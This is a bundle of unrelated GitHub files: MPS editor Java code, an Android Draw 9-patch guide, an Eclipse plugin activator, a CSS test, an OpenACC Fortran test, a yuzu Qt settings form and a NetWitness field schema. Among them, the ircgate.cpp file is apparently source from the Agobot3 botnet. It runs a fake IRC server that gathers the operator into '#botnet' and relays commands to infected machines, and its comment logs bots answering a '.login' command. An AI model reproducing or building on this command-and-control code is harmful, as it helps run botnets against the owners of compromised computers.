private static final Object OBJ = new Object();
public void installElementCellActions(SNode elementNode, EditorCell elementCell, boolean isEmptyCell) {
if (elementCell.getUserObject(AbstractCellListHandler.ELEMENT_CELL_COMPLETE_SET) == null) {
if (elementCell.getSubstituteInfo() == null || elementCell.getSubstituteInfo() instanceof DefaultSubstituteInfo) {
elementCell.putUserObject(AbstractCellListHandler.ELEMENT_CELL_COMPLETE_SET, OBJ);
elementCell.setSubstituteInfo((isEmptyCell ? new SEmptyContainmentSubstituteInfo(elementCell) : new SChildSubstituteInfo(elementCell)));
}
}
if (elementCell.getUserObject(AbstractCellListHandler.ELEMENT_CELL_DELETE_SET) == null) {
if (elementNode != null) {
elementCell.putUserObject(AbstractCellListHandler.ELEMENT_CELL_DELETE_SET, OBJ);
elementCell.setAction(CellActionType.DELETE, new CellAction_DeleteNode(elementNode, CellAction_DeleteNode.DeleteDirection.FORWARD));
}
}
if (elementCell.getUserObject(ELEMENT_CELL_BACKSPACE_SET) == null) {
if (elementNode != null) {
elementCell.putUserObject(ELEMENT_CELL_BACKSPACE_SET, OBJ);
elementCell.setAction(CellActionType.BACKSPACE, new CellAction_DeleteNode(elementNode, CellAction_DeleteNode.DeleteDirection.BACKWARD));
}
}
if (elementCell.getUserObject(AbstractCellListHandler.ELEMENT_CELL_ACTIONS_SET) == null) {
if (elementNode != null) {
elementCell.putUserObject(AbstractCellListHandler.ELEMENT_CELL_ACTIONS_SET, OBJ);
}
}
}
}
private EditorCell createConstant_2() {
EditorCell_Constant editorCell = new EditorCell_Constant(getEditorContext(), myNode, "");
editorCell.setCellId("Constant_n7kiqy_b1b0");
Style style = new StyleImpl();
style.set(StyleAttributes.SELECTABLE, false);
editorCell.getStyle().putAll(style);
editorCell.setDefaultText("");
return editorCell;
}
private EditorCell createRefNode_0() {
SingleRoleCellProvider provider = new initBlockSingleRoleHandler_n7kiqy_c1b0(myNode, LINKS.initBlock$HXQ8, getEditorContext());
return provider.createCell();
}
private static class initBlockSingleRoleHandler_n7kiqy_c1b0 extends SingleRoleCellProvider {
@NotNull
private SNode myNode;
public initBlockSingleRoleHandler_n7kiqy_c1b0(SNode ownerNode, SContainmentLink containmentLink, EditorContext context) {
super(containmentLink, context);
myNode = ownerNode;
}
@Override
@NotNull
public SNode getNode() {
return myNode;
}
protected EditorCell createChildCell(SNode child) {
EditorCell editorCell = getUpdateSession().updateChildNodeCell(child);
editorCell.setAction(CellActionType.DELETE, new CellAction_DeleteSmart(getNode(), LINKS.initBlock$HXQ8, child));
editorCell.setAction(CellActionType.BACKSPACE, new CellAction_DeleteSmart(getNode(), LINKS.initBlock$HXQ8, child));
installCellInfo(child, editorCell, false);
return editorCell;
}
private void installCellInfo(SNode child, EditorCell editorCell, boolean isEmpty) {
if (editorCell.getSubstituteInfo() == null || editorCell.getSubstituteInfo() instanceof DefaultSubstituteInfo) {
editorCell.setSubstituteInfo((isEmpty ? new SEmptyContainmentSubstituteInfo(editorCell) : new SChildSubstituteInfo(editorCell)));
}
if (editorCell.getSRole() == null) {
editorCell.setSRole(LINKS.initBlock$HXQ8);
}
}
@Override
protected EditorCell createEmptyCell() {
getCellFactory().pushCellContext();
getCellFactory().setNodeLocation(new SNodeLocation.FromParentAndLink(getNode(), LINKS.initBlock$HXQ8));
try {
EditorCell editorCell = super.createEmptyCell();
editorCell.setCellId("empty_initBlock");
installCellInfo(null, editorCell, true);
setCellContext(editorCell);
return editorCell;
} finally {
getCellFactory().popCellContext();
}
}
protected String getNoTargetText() {
return "<init block>";
}
}
private EditorCell createConstant_3() {
EditorCell_Constant editorCell = new EditorCell_Constant(getEditorContext(), myNode, "");
editorCell.setCellId("Constant_n7kiqy_d1b0");
Style style = new StyleImpl();
style.set(StyleAttributes.SELECTABLE, false);
editorCell.getStyle().putAll(style);
editorCell.setDefaultText("");
return editorCell;
}
private EditorCell createRefNode_1() {
SingleRoleCellProvider provider = new disposeBlockSingleRoleHandler_n7kiqy_e1b0(myNode, LINKS.disposeBlock$HY59, getEditorContext());
return provider.createCell();
}
private static class disposeBlockSingleRoleHandler_n7kiqy_e1b0 extends SingleRoleCellProvider {
@NotNull
private SNode myNode;
public disposeBlockSingleRoleHandler_n7kiqy_e1b0(SNode ownerNode, SContainmentLink containmentLink, EditorContext context) {
super(containmentLink, context);
myNode = ownerNode;
}
@Override
@NotNull
public SNode getNode() {
return myNode;
}
protected EditorCell createChildCell(SNode child) {
EditorCell editorCell = getUpdateSession().updateChildNodeCell(child);
editorCell.setAction(CellActionType.DELETE, new CellAction_DeleteSmart(getNode(), LINKS.disposeBlock$HY59, child));
editorCell.setAction(CellActionType.BACKSPACE, new CellAction_DeleteSmart(getNode(), LINKS.disposeBlock$HY59, child));
installCellInfo(child, editorCell, false);
return editorCell;
}
private void installCellInfo(SNode child, EditorCell editorCell, boolean isEmpty) {
if (editorCell.getSubstituteInfo() == null || editorCell.getSubstituteInfo() instanceof DefaultSubstituteInfo) {
editorCell.setSubstituteInfo((isEmpty ? new SEmptyContainmentSubstituteInfo(editorCell) : new SChildSubstituteInfo(editorCell)));
}
if (editorCell.getSRole() == null) {
editorCell.setSRole(LINKS.disposeBlock$HY59);
}
}
@Override
protected EditorCell createEmptyCell() {
getCellFactory().pushCellContext();
getCellFactory().setNodeLocation(new SNodeLocation.FromParentAndLink(getNode(), LINKS.disposeBlock$HY59));
try {
EditorCell editorCell = super.createEmptyCell();
editorCell.setCellId("empty_disposeBlock");
installCellInfo(null, editorCell, true);
setCellContext(editorCell);
return editorCell;
} finally {
getCellFactory().popCellContext();
}
}
protected String getNoTargetText() {
return "<dispose block>";
}
}
private EditorCell createConstant_4() {
EditorCell_Constant editorCell = new EditorCell_Constant(getEditorContext(), myNode, "}");
editorCell.setCellId("Constant_n7kiqy_c0");
Style style = new StyleImpl();
style.set(StyleAttributes.MATCHING_LABEL, "brace");
style.set(StyleAttributes.INDENT_LAYOUT_NO_WRAP, true);
style.set(StyleAttributes.FONT_STYLE, MPSFonts.PLAIN);
editorCell.getStyle().putAll(style);
editorCell.setDefaultText("");
return editorCell;
}
private static final class PROPS {
/*package*/ static final SProperty name$MnvL = MetaAdapterFactory.getProperty(0xceab519525ea4f22L, 0x9b92103b95ca8c0cL, 0x110396eaaa4L, 0x110396ec041L, "name");
}
private static final class CONCEPTS {
/*package*/ static final SConcept PropertyAttribute$Gb = MetaAdapterFactory.getConcept(0xceab519525ea4f22L, 0x9b92103b95ca8c0cL, 0x2eb1ad060897da56L, "jetbrains.mps.lang.core.structure.PropertyAttribute");
/*package*/ static final SConcept DefaultClassifierFieldDeclaration$Hv = MetaAdapterFactory.getConcept(0x443f4c36fcf54eb6L, 0x95008d06ed259e3eL, 0x11aa7fc0293L, "jetbrains.mps.baseLanguage.classifiers.structure.DefaultClassifierFieldDeclaration");
}
private static final class LINKS {
/*package*/ static final SContainmentLink fieldDeclaration$HYka = MetaAdapterFactory.getContainmentLink(0xef7bf5acd06c4342L, 0xb11de42104eb9343L, 0x6b059b0986f2058L, 0x6b059b0986f205cL, "fieldDeclaration");
/*package*/ static final SContainmentLink initBlock$HXQ8 = MetaAdapterFactory.getContainmentLink(0xef7bf5acd06c4342L, 0xb11de42104eb9343L, 0x6b059b0986f2058L, 0x6b059b0986f205aL, "initBlock");
/*package*/ static final SContainmentLink disposeBlock$HY59 = MetaAdapterFactory.getContainmentLink(0xef7bf5acd06c4342L, 0xb11de42104eb9343L, 0x6b059b0986f2058L, 0x6b059b0986f205bL, "disposeBlock");
}
}
| {
"pile_set_name": "Github"
} |
page.title=Draw 9-patch
page.tags="NinePatch"
@jd:body
<p>The Draw 9-patch tool allows you to easily create a
{@link android.graphics.NinePatch} graphic using a WYSIWYG editor.</p>
<p>For an introduction to Nine-patch graphics and how they work, please read
the section about Nine-patch in the
<a href="{@docRoot}guide/topics/graphics/2d-graphics.html#nine-patch">2D Graphics</a>
document.</p>
<img src="{@docRoot}images/draw9patch-norm.png" style="float:right" alt="" height="300" width="341"
/>
<p>Here's a quick guide to create a Nine-patch graphic using the Draw 9-patch tool.
You'll need the PNG image with which you'd like to create a NinePatch.</p>
<ol>
<li>From a terminal, launch the <code>draw9patch</code> application from your SDK
<code>/tools</code> directory.
</li>
<li>Drag your PNG image into the Draw 9-patch window
(or <strong>File</strong> > <strong>Open 9-patch...</strong> to locate the file).
Your workspace will now open.
<p>The left pane is your drawing area, in which you can edit the lines for the
stretchable patches and content area. The right
pane is the preview area, where you can preview your graphic when stretched.</p>
</li>
<li>Click within the 1-pixel perimeter to draw the lines that define the stretchable
patches and (optional) content area. Right-click (or hold Shift and click, on Mac) to erase
previously drawn lines.
</li>
<li>When done, select <strong>File</strong> > <strong>Save 9-patch...</strong>
<p>Your image will be saved with the <code>.9.png</code> file name.</p>
</li>
</ol>
<p class="note"><strong>Note:</strong> A normal PNG file (<code>*.png</code>) will be
loaded with an empty one-pixel border added around the image, in which you can draw
the stretchable patches and content area.
A previously saved 9-patch file (<code>*.9.png</code>) will be loaded as-is,
with no drawing area added, because it already exists.</p>
<img src="{@docRoot}images/draw9patch-bad.png" style="float:right;clear:both" alt="" height="300" width="341"
/>
<p>Optional controls include:</p>
<ul>
<li><strong>Zoom</strong>: Adjust the zoom level of the graphic in the drawing area.</li>
<li><strong>Patch scale</strong>: Adjust the scale of the images in the preview area.</li>
<li><strong>Show lock</strong>: Visualize the non-drawable area of the graphic on mouse-over.</li>
<li><strong>Show patches</strong>: Preview the stretchable patches in the drawing area (pink is a
stretchable patch).</li>
<li><strong>Show content</strong>: Highlight the content area in the preview images
(purple is the area in which content is allowed).</li>
<li><strong>Show bad patches</strong>: Adds a red border around patch areas that may
produce artifacts in the graphic when stretched. Visual coherence of your stretched
image will be maintained if you eliminate all bad patches.</li>
</ul>
| {
"pile_set_name": "Github"
} |
package de.vogella.rcp.commands.enable;
import org.eclipse.jface.resource.ImageDescriptor;
import org.eclipse.ui.plugin.AbstractUIPlugin;
import org.osgi.framework.BundleContext;
/**
* The activator class controls the plug-in life cycle
*/
public class Activator extends AbstractUIPlugin {
// The plug-in ID
public static final String PLUGIN_ID = "de.vogella.rcp.commands.enable";
// The shared instance
private static Activator plugin;
/**
* The constructor
*/
public Activator() {
}
/*
* (non-Javadoc)
* @see org.eclipse.ui.plugin.AbstractUIPlugin#start(org.osgi.framework.BundleContext)
*/
public void start(BundleContext context) throws Exception {
super.start(context);
plugin = this;
}
/*
* (non-Javadoc)
* @see org.eclipse.ui.plugin.AbstractUIPlugin#stop(org.osgi.framework.BundleContext)
*/
public void stop(BundleContext context) throws Exception {
plugin = null;
super.stop(context);
}
/**
* Returns the shared instance
*
* @return the shared instance
*/
public static Activator getDefault() {
return plugin;
}
/**
* Returns an image descriptor for the image file at the given
* plug-in relative path
*
* @param path the path
* @return the image descriptor
*/
public static ImageDescriptor getImageDescriptor(String path) {
return imageDescriptorFromPlugin(PLUGIN_ID, path);
}
}
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CSS Test: First-letter with the 'right white curly bracket' punctuation character</title>
<link rel="author" title="Microsoft" href="http://www.microsoft.com/" />
<link rel="help" href="http://www.w3.org/TR/CSS21/selector.html#first-letter" />
<link rel="match" href="first-letter-punctuation-023-ref.xht" />
<meta name="flags" content="" />
<meta name="assert" content="Punctuation characters defined in Unicode [UNICODE] in (Ps),(Pe),(Pi),(Pf) and (Po) punctuation classes that precede or follow the first letter are included in first-letter selection - 'right white curly bracket'." />
<style type="text/css">
div:first-letter
{
color: green;
font-size: 36px;
line-height: 2;
}
</style>
</head>
<body>
<p>Test passes if the "T" and surrounding punctuation below are green.</p>
<div>⦄T⦄est</div>
</body>
</html>
| {
"pile_set_name": "Github"
} |
#include "main.h"
#include "mainctrl.h"
#include "utility.h"
#include "ircgate.h"
/*
NICK Ago
USER Ago ago irc.secsup.uu.net :Ago
NOTICE AUTH :*** Looking up your hostname...
NOTICE AUTH :*** Checking Ident
NOTICE AUTH :*** Found your hostname
:irc.secsup.org 001 Ago :Welcome to the Internet Relay Network Ago
:irc.secsup.org 002 Ago :Your host is irc.secsup.org[63.98.19.242/6667], running version 2.8/hybrid-6.3.1
NOTICE Ago :*** Your host is irc.secsup.org[63.98.19.242/6667], running version 2.8/hybrid-6.3.1
:irc.secsup.org 003 Ago :This server was created Tue Jan 21 2003 at 16:57:32 GMT
:irc.secsup.org 004 Ago irc.secsup.org 2.8/hybrid-6.3.1 oOiwszcrkfydnxb biklmnopstve
:irc.secsup.org 005 Ago WALLCHOPS PREFIX=(ov)@+ CHANTYPES=#& MAXCHANNELS=100 MAXBANS=25 NICKLEN=9 TOPICLEN=120 KICKLEN=90 NETWORK=EFnet CHANMODES=b,k,l,imnpst KNOCK MODES=4 :are supported by this server
:irc.secsup.org 251 Ago :There are 5968 users and 105973 invisible on 57 servers
:irc.secsup.org 252 Ago 434 :IRC Operators online
:irc.secsup.org 254 Ago 43934 :channels formed
:irc.secsup.org 255 Ago :I have 2919 clients and 1 servers
:irc.secsup.org 265 Ago :Current local users: 2919 Max: 4026
:irc.secsup.org 266 Ago :Current global users: 111941 Max: 125618
:irc.secsup.org 250 Ago :Highest connection count: 4027 (4026 clients) (151553 since server was (re)started)
:irc.secsup.org 375 Ago :- irc.secsup.org Message of the Day -
:irc.secsup.org 372 Ago :- This is a server
:irc.secsup.org 372 Ago :- like many others
:irc.secsup.org 372 Ago :- it is serving
:irc.secsup.org 372 Ago :-
:irc.secsup.org 372 Ago :- please don't abuse it
:irc.secsup.org 372 Ago :- or I will be mad
:irc.secsup.org 376 Ago :End of /MOTD command.
:Ago MODE Ago :+i
JOIN #bla
:irc.secsup.org 475 Ago #bla :Cannot join channel (+k)
JOIN #bla0r
:[email protected] JOIN :#bla0r
:irc.secsup.org MODE #bla0r +nt
:irc.secsup.org 353 Ago = #bla0r :@Ago
:irc.secsup.org 366 Ago #bla0r :End of /NAMES list.
MODE #bla0r
WHO #bla0r
:irc.secsup.org 324 Ago #bla0r +tn
:irc.secsup.org 329 Ago #bla0r 1059462330
:irc.secsup.org 352 Ago #bla0r ~Ago frb9-d9bb4a80.pool.mediaWays.net irc.secsup.org Ago H@ :0 Ago
:irc.secsup.org 315 Ago #bla0r :End of /WHO list.
PART #bla0r :Client exiting
:[email protected] PART #bla0r
PRIVMSG #bla0r :.login Ago bunghole
:[Ago][email protected] PRIVMSG #bla0r :Password accepted.
:[Ago][email protected] PRIVMSG #bla0r :Password accepted.
:[Ago][email protected] PRIVMSG #bla0r :Password accepted.
:[Ago]pdak!~woinggg@CPE00e018f32af5-CM014400121364.cpe.net.cable.rogers.com PRIVMSG #bla0r :Password accepted.
:[Ago][email protected] PRIVMSG #bla0r :Password accepted.
:[Ago][email protected] PRIVMSG #bla0r :Password accepted.
:[Ago][email protected] PRIVMSG #bla0r :Password accepted.
:[email protected] PRIVMSG #bla0r :Password accepted.
:[Ago][email protected] PRIVMSG #bla0r :Password accepted.
*/
CIRCGate::CIRCGate() { m_bRunning=true; m_sListenSock=-1; m_sServerSock=-1; }
CIRCGate::~CIRCGate() throw() { m_bRunning=false; if(m_sListenSock!=-1) xClose(m_sListenSock); if(m_sServerSock!=-1) xClose(m_sServerSock); }
void CIRCGate::run() throw()
{ // Create the shared listen socket on IRC port
sockaddr_in issin; memset(&issin, 0, sizeof(issin)); issin.sin_family=AF_INET;
issin.sin_addr.s_addr=INADDR_ANY; issin.sin_port=htons(6667);
m_sListenSock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(m_sListenSock!=-1) {
#ifdef WIN32
WSAAsyncSelect(m_sListenSock, 0, WM_USER + 1, FD_READ);
#endif
bind(m_sListenSock, (sockaddr *)&issin, sizeof(issin)); listen(m_sListenSock, 10); }
else // Uuhhh, spew something
{ g_cMainCtrl.m_cConsDbg.Log(1, "CIRCGate(0x%8.8Xh): Port %d is already bound, or something wicked happened!\n", this, 6667);
m_bRunning=false; return; }
while(m_bRunning)
{ // Accept an incoming connection from the shared listen socket
sockaddr_in cssin; socklen_t cssin_len=sizeof(cssin);
m_sServerSock=accept(m_sListenSock, (sockaddr *)&cssin, &cssin_len);
if(m_sServerSock!=-1) // We got a client
{ // Get the remote ip via getpeername, and store it in m_sClientIp
sockaddr sa; socklen_t sas=sizeof(sa); memset(&sa, 0, sizeof(sa)); getpeername(m_sServerSock, &sa, &sas);
char szTemp[32]; sprintf(szTemp, "%d.%d.%d.%d", (unsigned char)sa.sa_data[2], (unsigned char)sa.sa_data[3], \
(unsigned char)sa.sa_data[4], (unsigned char)sa.sa_data[5]);
m_sClientIp.Assign(szTemp); g_cMainCtrl.m_cConsDbg.Log(3, "CIRCGate(0x%8.8Xh): Connection from \"%s\" accepted!\n", this, m_sClientIp.CStr());
IRCLoop(); xClose(m_sServerSock); } }
if(m_sListenSock!=-1) xClose(m_sListenSock); }
bool CIRCGate::RecvLine(int sSocket, char *szBuffer, int iBufSize)
{ int iBufIndex=0; szBuffer[iBufIndex]='\0'; bool bReceiving=true;
while(iBufIndex<iBufSize && &szBuffer[iBufIndex] && bReceiving)
{ int iRead=xRead(sSocket, &szBuffer[iBufIndex], 1);
if(!iRead || iRead==-1) return false; szBuffer[iBufIndex+1]='\0';
if(szBuffer[iBufIndex]=='\n' || !szBuffer[iBufIndex]) bReceiving=false;
iBufIndex++; }
szBuffer[iBufSize-1]='\0'; szBuffer[iBufIndex-2]='\0'; return true; }
void CIRCGate::IRCLoop()
{ CString sWelcome, sAutojoin;
// NICK
char szTemp[4096]; m_bRunning=RecvLine(m_sServerSock, szTemp, sizeof(szTemp));
CTokenizer tok(szTemp, " \r\n"); tok.Next(m_sClientNick); tok.Next(m_sClientNick);
// USER
m_bRunning=RecvLine(m_sServerSock, szTemp, sizeof(szTemp));
sWelcome.Format(":irc.evil.org 001 %s :Welcome to the Internet Relay Network %s\r\n",
m_sClientNick.CStr(), m_sClientNick.CStr());
xWrite(m_sServerSock, sWelcome.CStr(), sWelcome.GetLength());
sWelcome.Format(":irc.evil.org 002 %s :Your host is irc.evil.org[127.0.0.1/6667], running version agobot3\r\n", m_sClientNick.CStr());
xWrite(m_sServerSock, sWelcome.CStr(), sWelcome.GetLength());
sAutojoin.Format(":%[email protected] JOIN :#botnet\r\n", m_sClientNick.CStr());
xWrite(m_sServerSock, sAutojoin.CStr(), sAutojoin.GetLength());
sAutojoin.Format(":irc.evil.org MODE #botnet +smtn\r\n");
xWrite(m_sServerSock, sAutojoin.CStr(), sAutojoin.GetLength());
sAutojoin.Format(":irc.evil.org 353 %s = #botnet :@%s\r\n", m_sClientNick.CStr(), m_sClientNick.CStr());
xWrite(m_sServerSock, sAutojoin.CStr(), sAutojoin.GetLength());
sAutojoin.Format(":irc.evil.org 366 %s #botnet :End of /NAMES list.\r\n", m_sClientNick.CStr());
xWrite(m_sServerSock, sAutojoin.CStr(), sAutojoin.GetLength());
while(m_bRunning)
{ m_bRunning=RecvLine(m_sServerSock, szTemp, sizeof(szTemp));
CString sReply, sRecv; sRecv.Assign(szTemp);
char *szTokens[256]; szTokens[0]=strtok(szTemp, " ");
for(int i=1;i<256;i++) szTokens[i]=strtok(NULL, " ");
if(!strcmp(szTokens[0], "MODE"))
{ sReply.Format(":irc.evil.org 324 %s #botnet +smtn\r\n", m_sClientNick.CStr());
xWrite(m_sServerSock, sReply.CStr(), sReply.GetLength());
sReply.Format(":irc.evil.org 329 %s #botnet 1059462330\r\n", m_sClientNick.CStr());
xWrite(m_sServerSock, sReply.CStr(), sReply.GetLength()); }
else if(!strcmp(szTokens[0], "WHO"))
{ sReply.Format(":irc.evil.org 352 %s #botnet ~none anon.ip irc.evil.org %s H@ :0 %s\r\n", m_sClientNick.CStr(), m_sClientNick.CStr(), m_sClientNick.CStr());
xWrite(m_sServerSock, sReply.CStr(), sReply.GetLength());
sReply.Format(":irc.evil.org 315 %s #botnet :End of /WHO list.\r\n", m_sClientNick.CStr());
xWrite(m_sServerSock, sReply.CStr(), sReply.GetLength()); }
else if(!strcmp(szTokens[0], "PRIVMSG"))
{ char *szText=strstr(sRecv.CStr(), ":"); szText+=1;
Send(szText, strlen(szText)); }
else
g_cMainCtrl.m_cConsDbg.Log(1, "CIRCGate(0x%8.8Xh): Got \"%s\"\n", this, szTemp);
}
}
void CIRCGate::Recv(char *szData, int iDataLen, message *pMsg)
{ CString sMsgBuf;
if(strstr(pMsg->szParams, g_cMainCtrl.m_sUniqueId.CStr()))
sMsgBuf.Format(":%[email protected] PRIVMSG #botnet :%s\r\n", m_sClientNick.CStr(), szData);
else
sMsgBuf.Format(":%[email protected] PRIVMSG #botnet :%s\r\n", (char*)(strstr(pMsg->szParams, ":"))+1, szData);
xWrite(m_sServerSock, sMsgBuf.CStr(), sMsgBuf.GetLength()); }
| {
"pile_set_name": "Github"
} |
! { dg-do run }
program asyncwait
integer, parameter :: N = 64
real, allocatable :: a(:), b(:), c(:)
integer i
allocate (a(N))
allocate (b(N))
allocate (c(N))
!$acc parallel async (0)
!$acc loop
do i = 1, N
a(i) = 1
end do
!$acc end parallel
!$acc parallel async (1)
!$acc loop
do i = 1, N
b(i) = 1
end do
!$acc end parallel
!$acc parallel wait (0, 1)
!$acc loop
do i = 1, N
c(i) = a(i) + b(i)
end do
!$acc end parallel
do i = 1, N
if (c(i) .ne. 2.0) STOP 1
end do
!$acc kernels async (0)
!$acc loop
do i = 1, N
a(i) = 1
end do
!$acc end kernels
!$acc kernels async (1)
!$acc loop
do i = 1, N
b(i) = 1
end do
!$acc end kernels
!$acc kernels wait (0, 1)
!$acc loop
do i = 1, N
c(i) = a(i) + b(i)
end do
!$acc end kernels
do i = 1, N
if (c(i) .ne. 2.0) STOP 2
end do
deallocate (a)
deallocate (b)
deallocate (c)
end program asyncwait
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<ui version="4.0">
<class>ConfigureWeb</class>
<widget class="QWidget" name="ConfigureWeb">
<property name="geometry">
<rect>
<x>0</x>
<y>0</y>
<width>926</width>
<height>561</height>
</rect>
</property>
<property name="windowTitle">
<string>Form</string>
</property>
<layout class="QVBoxLayout" name="verticalLayout">
<item>
<layout class="QVBoxLayout" name="verticalLayout_3">
<item>
<widget class="QGroupBox" name="groupBoxWebConfig">
<property name="title">
<string>yuzu Web Service</string>
</property>
<layout class="QVBoxLayout" name="verticalLayoutYuzuWebService">
<item>
<widget class="QLabel" name="web_credentials_disclaimer">
<property name="text">
<string>By providing your username and token, you agree to allow yuzu to collect additional usage data, which may include user identifying information.</string>
</property>
</widget>
</item>
<item>
<layout class="QGridLayout" name="gridLayoutYuzuUsername">
<item row="2" column="3">
<widget class="QPushButton" name="button_verify_login">
<property name="sizePolicy">
<sizepolicy hsizetype="Fixed" vsizetype="Fixed">
<horstretch>0</horstretch>
<verstretch>0</verstretch>
</sizepolicy>
</property>
<property name="layoutDirection">
<enum>Qt::RightToLeft</enum>
</property>
<property name="text">
<string>Verify</string>
</property>
</widget>
</item>
<item row="2" column="0">
<widget class="QLabel" name="web_signup_link">
<property name="text">
<string>Sign up</string>
</property>
</widget>
</item>
<item row="0" column="1" colspan="3">
<widget class="QLabel" name="username" />
</item>
<item row="1" column="0">
<widget class="QLabel" name="label_token">
<property name="text">
<string>Token: </string>
</property>
</widget>
</item>
<item row="1" column="4">
<widget class="QLabel" name="label_token_verified">
</widget>
</item>
<item row="0" column="0">
<widget class="QLabel" name="label_username">
<property name="text">
<string>Username: </string>
</property>
</widget>
</item>
<item row="1" column="1" colspan="3">
<widget class="QLineEdit" name="edit_token">
<property name="maxLength">
<number>80</number>
</property>
<property name="echoMode">
<enum>QLineEdit::Password</enum>
</property>
</widget>
</item>
<item row="2" column="1">
<widget class="QLabel" name="web_token_info_link">
<property name="text">
<string>What is my token?</string>
</property>
</widget>
</item>
<item row="2" column="2">
<spacer name="horizontalSpacer">
<property name="orientation">
<enum>Qt::Horizontal</enum>
</property>
<property name="sizeHint" stdset="0">
<size>
<width>40</width>
<height>20</height>
</size>
</property>
</spacer>
</item>
</layout>
</item>
</layout>
</widget>
</item>
<item>
<widget class="QGroupBox" name="groupBox">
<property name="title">
<string>Telemetry</string>
</property>
<layout class="QVBoxLayout" name="verticalLayout_2">
<item>
<widget class="QCheckBox" name="toggle_telemetry">
<property name="text">
<string>Share anonymous usage data with the yuzu team</string>
</property>
</widget>
</item>
<item>
<widget class="QLabel" name="telemetry_learn_more">
<property name="text">
<string>Learn more</string>
</property>
</widget>
</item>
<item>
<layout class="QGridLayout" name="gridLayoutTelemetryId">
<item row="0" column="0">
<widget class="QLabel" name="label_telemetry_id">
<property name="text">
<string>Telemetry ID:</string>
</property>
</widget>
</item>
<item row="0" column="1">
<widget class="QPushButton" name="button_regenerate_telemetry_id">
<property name="sizePolicy">
<sizepolicy hsizetype="Fixed" vsizetype="Fixed">
<horstretch>0</horstretch>
<verstretch>0</verstretch>
</sizepolicy>
</property>
<property name="layoutDirection">
<enum>Qt::RightToLeft</enum>
</property>
<property name="text">
<string>Regenerate</string>
</property>
</widget>
</item>
</layout>
</item>
</layout>
</widget>
</item>
</layout>
</item>
<item>
<widget class="QGroupBox" name="discord_group">
<property name="title">
<string>Discord Presence</string>
</property>
<layout class="QVBoxLayout" name="verticalLayout_21">
<item>
<widget class="QCheckBox" name="toggle_discordrpc">
<property name="text">
<string>Show Current Game in your Discord Status</string>
</property>
</widget>
</item>
</layout>
</widget>
</item>
<item>
<spacer name="verticalSpacer">
<property name="orientation">
<enum>Qt::Vertical</enum>
</property>
<property name="sizeHint" stdset="0">
<size>
<width>20</width>
<height>40</height>
</size>
</property>
</spacer>
</item>
</layout>
</widget>
<resources/>
<connections/>
</ui>
| {
"pile_set_name": "Github"
} |
- name: network.interface.name
overwrite: true
type: keyword
default_field: false
description: >
Name of the network interface where the traffic has been observed.
- name: rsa
overwrite: true
type: group
default_field: false
fields:
- name: internal
overwrite: true
type: group
fields:
- name: msg
overwrite: true
type: keyword
description: This key is used to capture the raw message that comes into the
Log Decoder
- name: messageid
overwrite: true
type: keyword
- name: event_desc
overwrite: true
type: keyword
- name: message
overwrite: true
type: keyword
description: This key captures the contents of instant messages
- name: time
overwrite: true
type: date
description: This is the time at which a session hits a NetWitness Decoder.
This key should never be used to parse Meta data from a session (Logs/Packets)
Directly, this is a Reserved key in NetWitness.
- name: level
overwrite: true
type: long
description: Deprecated key defined only in table map.
- name: msg_id
overwrite: true
type: keyword
description: This is the Message ID1 value that identifies the exact log parser
definition which parses a particular log session. This key should never be
used to parse Meta data from a session (Logs/Packets) Directly, this is a
Reserved key in NetWitness
- name: msg_vid
overwrite: true
type: keyword
description: This is the Message ID2 value that identifies the exact log parser
definition which parses a particular log session. This key should never be
used to parse Meta data from a session (Logs/Packets) Directly, this is a
Reserved key in NetWitness
- name: data
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: obj_server
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: obj_val
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: resource
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: obj_id
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: statement
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: audit_class
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: entry
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: hcode
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: inode
overwrite: true
type: long
description: Deprecated key defined only in table map.
- name: resource_class
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: dead
overwrite: true
type: long
description: Deprecated key defined only in table map.
- name: feed_desc
overwrite: true
type: keyword
description: This is used to capture the description of the feed. This key should
never be used to parse Meta data from a session (Logs/Packets) Directly, this
is a Reserved key in NetWitness
- name: feed_name
overwrite: true
type: keyword
description: This is used to capture the name of the feed. This key should never
be used to parse Meta data from a session (Logs/Packets) Directly, this is
a Reserved key in NetWitness
- name: cid
overwrite: true
type: keyword
description: This is the unique identifier used to identify a NetWitness Concentrator.
This key should never be used to parse Meta data from a session (Logs/Packets)
Directly, this is a Reserved key in NetWitness
- name: device_class
overwrite: true
type: keyword
description: This is the Classification of the Log Event Source under a predefined
fixed set of Event Source Classifications. This key should never be used to
parse Meta data from a session (Logs/Packets) Directly, this is a Reserved
key in NetWitness
- name: device_group
overwrite: true
type: keyword
description: This key should never be used to parse Meta data from a session
(Logs/Packets) Directly, this is a Reserved key in NetWitness
- name: device_host
overwrite: true
type: keyword
description: This is the Hostname of the log Event Source sending the logs to
NetWitness. This key should never be used to parse Meta data from a session
(Logs/Packets) Directly, this is a Reserved key in NetWitness
- name: device_ip
overwrite: true
type: ip
description: This is the IPv4 address of the Log Event Source sending the logs
to NetWitness. This key should never be used to parse Meta data from a session
(Logs/Packets) Directly, this is a Reserved key in NetWitness
- name: device_ipv6
overwrite: true
type: ip
description: This is the IPv6 address of the Log Event Source sending the logs
to NetWitness. This key should never be used to parse Meta data from a session
(Logs/Packets) Directly, this is a Reserved key in NetWitness
- name: device_type
overwrite: true
type: keyword
description: This is the name of the log parser which parsed a given session.
This key should never be used to parse Meta data from a session (Logs/Packets)
Directly, this is a Reserved key in NetWitness
- name: device_type_id
overwrite: true
type: long
description: Deprecated key defined only in table map.
- name: did
overwrite: true
type: keyword
description: This is the unique identifier used to identify a NetWitness Decoder.
This key should never be used to parse Meta data from a session (Logs/Packets)
Directly, this is a Reserved key in NetWitness
- name: entropy_req
overwrite: true
type: long
description: This key is only used by the Entropy Parser, the Meta Type can
